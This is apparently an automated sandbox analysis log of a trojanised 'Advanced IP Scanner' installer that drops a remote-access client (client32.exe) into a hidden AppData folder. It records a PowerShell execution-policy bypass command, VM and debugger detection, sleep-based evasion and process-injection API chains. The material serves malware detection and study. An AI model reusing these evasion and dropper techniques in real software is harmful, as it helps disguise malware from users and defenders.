Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-Q7LP1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FPRGF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-6P215.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-9LCE6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-8A8B0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-6E54C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-PK80C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-D0K3T.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-C54PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DS1TD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QFJMG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-R0Q1K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-0TGAP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-KE7IL.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IO07H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-L306R.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-8I1NP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-PCUQ8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2U0U8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2K0TF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-95T15.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_6-90110
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_6-93082
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_6-93372
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_6-93533
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_6-90318

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API coverage: 5.8 %
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API coverage: 2.6 %

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 8_2_11069C99

8_2_11069C99

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 5828	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 5228	Thread sleep time: -43300s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 5828	Thread sleep time: -2006000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_68C73130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 68C73226h

6_2_68C73130

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_11123570
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_11069690
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	6_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	6_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11064E30
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	8_2_11123570
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	8_2_11069690
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	8_2_11064E30

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000004.00000002.1654538117.000000000314E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: is-KTCHF.tmp.2.dr	Binary or memory string: 000569FFFFFF VMware, Inc.
Source: client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: client32.exe, 0000000A.00000002.1757451885.0000000000462000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1756759801.000000000045F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: is-KTCHF.tmp.2.dr	Binary or memory string: 005056FFFFFF VMware, Inc.
Source: KC0uZWwr8p.tmp, 00000002.00000003.1785134281.0000000001380000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$
Source: client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: client32.exe, 00000006.00000002.3146995488.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1875925880.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3147138896.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: is-KTCHF.tmp.2.dr	Binary or memory string: 001C14FFFFFF VMware, Inc.
Source: client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: VMWare
Source: client32.exe, 00000006.00000002.3139511976.000000000067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: is-KTCHF.tmp.2.dr	Binary or memory string: 000C29FFFFFF VMware, Inc.
Source: client32.exe, 00000008.00000003.1672599298.000000000046F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: is-MH6KB.tmp.2.dr	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API call chain: ExitProcess graph end node	graph_6-92882
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API call chain: ExitProcess graph end node	graph_6-92975
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_1116A559

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,

6_2_110CFCF0

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

6_2_11029230

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11178A14 RpcServerRegisterIf3,__lseeki64_nolock,RpcServerRegisterIf3,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

6_2_11178A14

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11030B10 SetUnhandledExceptionFilter,	6_2_11030B10
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1116A559
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_1115E4D1
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C828E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_68C828E1
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11030B10 SetUnhandledExceptionFilter,	8_2_11030B10
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_1116A559
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_1115E4D1

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1"

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,

6_2_110F2280

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1110F410 GetKeyState,DeviceIoControl,keybd_event,

6_2_1110F410

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

6_2_1109D4A0

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

6_2_1109DC20

Source: client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Progman

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_11170208
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_1117053C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11170499
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoA,	6_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_11170106
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_111701AD
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_11170011
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_111703D9
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11170500
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	6_2_68C8FAE1
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_68C9DB7C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_68C91CC1
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoA,	6_2_68C9DC99
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_68C9DC56
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_68C91DB6
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_68C91EB8
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_68C91E5D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_68C90F39
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_68C92089
